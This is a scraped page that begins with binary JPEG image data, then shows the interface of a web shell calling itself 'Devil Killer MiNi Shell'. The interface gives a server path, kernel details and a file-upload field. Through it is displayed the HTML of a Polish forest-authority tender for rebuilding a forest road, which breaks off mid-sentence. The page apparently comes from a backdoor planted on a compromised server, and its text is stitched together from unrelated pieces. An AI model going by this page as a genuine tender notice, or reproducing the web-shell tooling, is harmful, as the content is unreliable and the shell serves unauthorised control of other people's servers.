JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250721/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250721/0033712501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa odcinka drogi leśnej dł.1,170 km na dz. nr. 175/1 <br/>w L. Sobieńczyce na terenie Nadleśnictwa Wejherowo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO WEJHEROWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190036849</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana III Sobieskiego 247 B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">586729810</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">586729800</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wejherowo@gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wejherowo.gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa odcinka drogi leśnej dł.1,170 km na dz. nr. 175/1 <br/>w L. Sobieńczyce na terenie Nadleśnictwa Wejherowo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ba4205c-3f53-4def-90c0-48289e62bcf9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00337125</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00573066/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Przebudowa drogi leśnej w L. Sobieńczyce odd.175</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_wejherowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_wejherowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1 Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana <br/>informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a <br/>wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu <br/>środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się <br/>środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. <br/>o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2024 r. poz. 1513).<br/>W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o którym mowa w art. 125 <br/>ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu <br/>udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej lub <br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym bądź <br/>kwalifikowanym podpisem elektronicznym.<br/>8.3 Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim przy <br/>użyciu Platformy Przetargowej Open Nexus: https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">38.1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Nadleśnictwo Wejherowo z siedzibą <br/>w Wejherowie 84-200, ul. Sobieskiego 247B, kontakt: osobisty w siedzibie nadleśnictwa, telefoniczny: 58 672 98 01 lub drogą elektroniczną na adres e-mail: wejherowo@gdansk.lasy.gov.pl<br/>2) W sprawach związanych z danymi osobowymi Wykonawca może kontaktować się z <br/>Nadleśnictwem Wejherowo, poprzez adres email: wejherowo@gdansk.lasy.gov.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>związanym z postępowaniem o udzielenie zamówienia publicznego „Przebudowa odcinka <br/>drogi leśnej dł.1,170 km na dz. nr. 175/1 w L. Sobieńczyce na terenie Nadleśnictwa <br/>Wejherowo” prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji;<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 <br/>r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.), dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez <br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas <br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania <br/>umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w <br/>szczególności ze względu na cele archiwalne- zgodnie z JRWA: dokumentacja zamówień <br/>publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast <br/>umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię <br/>archiwalną B10 (okres przechowywania 10 lat);<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO <br/>***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO;<br/>9) Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c <br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.80.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 465640,55 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie inwestycyjne pn.: <br/>„Przebudowa odcinka drogi leśnej dł.1,170 km na dz. nr. 175/1 w L. Sobieńczyce<br/>na terenie Nadleśnictwa Wejherowo”<br/>5.1. w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/>Wspólny Słownik Zamówień (CPV):<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty <br/>ziemne<br/>45233120-6 Roboty w zakresie budowy dróg<br/>5.1.1. Zakres prac:<br/>Przebudowa odcinka drogi leśnej, w ramach którego przewiduje się:<br/>• Wykonanie robót przygotowawczych:<br/>Zakres przygotowawczy obejmuje roboty związane z przygotowaniem terenu pod realizację robót <br/>drogowych. W celu realizacji w/w robót należy sporządzić i uzgodnić z zarządcą drogi tj. <br/>Zamawiającym zakres oraz formę wykonania robót drogowych. Do zakresu robót <br/>przygotowawczych należy również zakres związany z usunięciem istniejących drzew i zakrzaczeń <br/>znajdujących się kolizyjnie w koronie projektowanej drogi (roboty w zakresie usunięcia drzew po <br/>stronie Zamawiającego, roboty związane z usunięciem karpin i zakrzaczeń w zakresie Wykonawcy <br/>– za zg.z ust. z Inwestorem/Zamawiającym).<br/>• Roboty ziemne:<br/>W skład robót ziemnych wchodzą roboty związane z :<br/>• Niwelacją istniejącego terenu w celu doprowadzenia do projektowanego profilu <br/>korony drogowej (w tym poszerzenia wykopów, wąwozów, niwelacja przewyższeń)<br/>• Korytowaniem powierzchownym w celu usunięcia zalegającej darniny<br/>• Profilowanie i dogęszczenie podłoża pod konstrukcję drogi<br/>• Profilowaniem skarp, podłoża pod w-wy konstrukcyjne do wartości założonych w projekcie<br/>• Odtworzenie i odmulenie ziemnych dołów odstojnikowych na wodę opadową<br/>• Odwodnienie:<br/>Wody deszczowe / opadowe z zakresu inwestycyjnego odprowadzane będą powierzchniowo za <br/>pomocą stosownie przyjętych pochyleń podłużnych i poprzecznych na tereny przyległe do drogi <br/>w zakresie działki będącej w zarządzie Inwestora, tereny zielone. <br/>• Urządzenia sieci podziemnych i napowietrznych :<br/>Projekt nie zakłada budowy nowych sieci podziemnych i napowietrznych w zakresie <br/>inwestycyjnym. Uzyskana MDCP od geodety oraz zasób internetowy dostępnych e-map również <br/>nie wykazuje sieci podziemnych w danym zakresie zaplanowanych robót. Jednakże z uwagi na<br/>możliwie potencjalne występowanie sieci, szczególnie w obrębie początkowym inwestycji należy <br/>prace budowlane prowadzić ze szczególną ostrożnością a roboty ziemne w danym obrębie należy <br/>wykonywać ręcznie i pod stałym nadzorem osób uprawnionych. Należy wykonać przekopy <br/>kontrolne w celu zlokalizowania ewentualnych sieci i je zabezpieczyć na czas prowadzenia robót <br/>drogowych (w przypadku konieczności zabezpieczenia sieci na stałe, należy postępować zgodnie <br/>z warunkami wskazanymi przez gestora danej sieci w uzgodnieniu jakie wydał lub jak zostało <br/>ustalone to na etapie trwania prac budowlanych z przedst. Zamawiającego).<br/>• Roboty konstrukcyjne:<br/>- wykonanie wymaganej podbudowy i nawierzchni na drodze, poboczach o docelowych <br/>parametrach wskazanych w pkt. 4.6.4. - Nawierzchnia drogi i roboty konstrukcyjne<br/>- wykonanie innych robót konstrukcyjnych. przybocznych wskazanych w przedmiarach <br/>inwestorskich<br/>• Parametry proj. nawierzchni drogowej:<br/>- kategoria : DLW (Droga Leśna Wewnętrzna) <br/>- szerokość korony drogi zasadniczej : 5,00 (jezdnia + pobocze utwardzone) <br/>- szerokość nawierzchni jezdni drogowej : 3,50m <br/>- szerokość poboczy z mieszanki/utwardzonych : 2*0,75m <br/>- szerokość poszerzeń grunt. : 2 x 1,00 (min.0,5m; w obrębie zaniżeń, wykopów bez rowów) <br/>- spadki poprzeczne nawierzchni drogowej : daszkowy/obustronny 5%<br/>- spadki poprzeczne poboczy : zewnętrzne 8%, 15-20% (dotyczy poszerzeń grunt. do 1,00m)<br/>- spadki podłużne drogi : w nawiązaniu do rzędnych istniejących i projektowanych<br/>• Założenia konstrukcyjno-nawierzchniowe:<br/>- w-wa nawierzchniowa (po zag. E2≥150MPa) <br/>- w-wa podbudowy (po zag. E2≥130MPa)<br/>- pobocza utwardzone (po zag. E2≥150MPa)<br/>Dokładne dane założeniowe zostały przedstawione na rysunkach graficznych/ przekrojach <br/>normalnych, konstrukcyjnych załączonych do niniejszej dokumentacji projektowej (PNK) <br/>(w przypadku lokalnych zaniżeń parametrowych, podłoże należy doprowadzić do wartości G1)<br/>• Zestawienie zasadniczych powierzchni projektowych:<br/>- jezdnia/nawierzchnia : 5082,0 m2<br/>- pobocza utwardzone : 1868,0 m2<br/>• Założenia projektowanej drogi: założenia materiałowe - Objaśnienia:<br/>- PBSM – Przekrusz Betonowy Stabilizowany Mechanicznie fr. 0/63mm<br/> Kruszywo Betonowe frakcji 0/63mm powstałe z przekruszenia betonów twardych<br/>- KŁSM – Kruszywo Łamane Stabilizowane Mechanicznie fr. 0/31,5mm<br/>- PK – Piasek Kopany fr. 0/2-0/4, siany lub płukany<br/>- C50/10 – Wymagany Stopień Przekruszenia Kruszywa Łamanego <br/>Konstrukcja dla całego układu drogowego<br/>- Nawierzchnia: KŁSM 0/31,5mm gr.10cm <br/>- Podbudowa: PBSM 0/63mm gr.15cm <br/>- Pobocza Utwardzone : konstrukcja jak dla układu jezdnego / niezmienna<br/>• Założenia dla zakresu robót ziemnych:<br/>̶ zagęszczenie podłoża pod w-wy konstrukcyjne: Is≥1.00 <br/>̶ zagęszczenie terenu przyległego do drogi: Is≥0,95<br/>̶ parametr pochylenia skarp: min.1:1,5 / zalecana 1:2 (jeżeli występuje). <br/>min. szerokość dna rowu i miarodajna jego wysokość: min. 0,50 / 0,60m (jeżeli występuje)<br/>• Wykonanie robót wykończeniowych i porządkowych <br/>Zakres robót wykończeniowych odnosi się głównie do robót porządkowych po wykonanych <br/>robotach drogowych. Teren znajdujący się w obszarze działań budowlanych należy doprowadzić <br/>do stanu porządkowego i użytecznego. Z terenu inwestycyjnego należy uprzątnąć wszelkie <br/>pozostawione rzeczy związane z procesem realizacyjnym. Przed przystąpieniem do procesu <br/>odbiorowego, w/w zakres robót należy odebrać przy udziale wyznaczonego Nadzoru-podmiotu <br/>wyznaczonego przez Zamawiającego/Inwestora.<br/>Szczegółowy przedmiot zamówienia określają n/w załączniki stanowiące dokumentację techniczną<br/>i Specyfikację Techniczną Wykonania i Odbioru Robót (STWiOR). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.1 Przy wyborze oferty najkorzystniejszej zamawiający będzie się kierował następującymi kryteriami:<br/>1) kryterium -cena oferty (C)- znaczenie procentowe kryterium 60%, maksymalna ilość punktów jaką może otrzymać kryterium -60<br/>punktów<br/>2) kryterium -wydłużenie okresu gwarancji i rękojmi (G)- znaczenie procentowe kryterium 40%, maksymalna ilość punktów jaką<br/>może otrzymać kryterium 40 punktów. Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 13.1 O udzielenie zamówienia publicznego, mogą ubiegać się wykonawcy, którzy nie podlegają <br/>wykluczeniu na zasadach określonych w rozdziale 12 SWZ oraz spełniają określone przez <br/>Zamawiającego warunki udziału w postępowaniu:<br/>13.2 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>13.2.1 zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o <br/>którym mowa w rozdziale 14 SWZ. <br/>13.2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o <br/>którym mowa w rozdziale 14 SWZ.<br/>13.2.3 sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o <br/>którym mowa w rozdziale 14 SWZ.<br/>13.2.4 zdolności technicznej lub zawodowej<br/>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne <br/>poziomy zdolności w zakresie doświadczenia tj., że w okresie ostatnich 5 lat, a jeżeli <br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co <br/>najmniej dwie roboty budowlane (realizowane na podstawie dwóch odrębnych umów) o <br/>wartości każdej z robót minimum 250 000 zł łącznie z podatkiem VAT każda, obejmującą<br/>swoim zakresem budowę lub przebudowę drogi.<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie <br/>dla uzyskania wymaganych wartości porównywalnych.<br/>W niniejszej SWZ definicje budowy, przebudowy lub remontu należy rozumieć zgodnie <br/>z definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2025 r. poz. 418).<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne <br/>poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do <br/>wykonania zamówienia:<br/>a) Kierownik budowy - minimalne wymagania:<br/>• kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami <br/>budowlanymi odpowiadające przedmiotowi zamówienia w zakresie specjalności <br/>inżynieryjnej drogowej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo <br/>budowlane (tj. Dz.U. z 2025 r. poz. 418) lub odpowiadające im uprawnienia <br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących <br/>przepisów,<br/>Na podstawie art. 104 ustawy z 